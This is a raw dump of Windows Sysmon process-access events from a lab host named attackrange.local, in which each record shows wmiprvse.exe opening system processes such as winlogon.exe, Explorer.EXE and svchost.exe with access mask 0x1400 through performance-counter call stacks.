21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151190Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151189Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151188Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151187Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151186Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151185Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151184Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151183Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151182Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151181Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151180Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151179Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151178Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151177Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151176Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151175Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 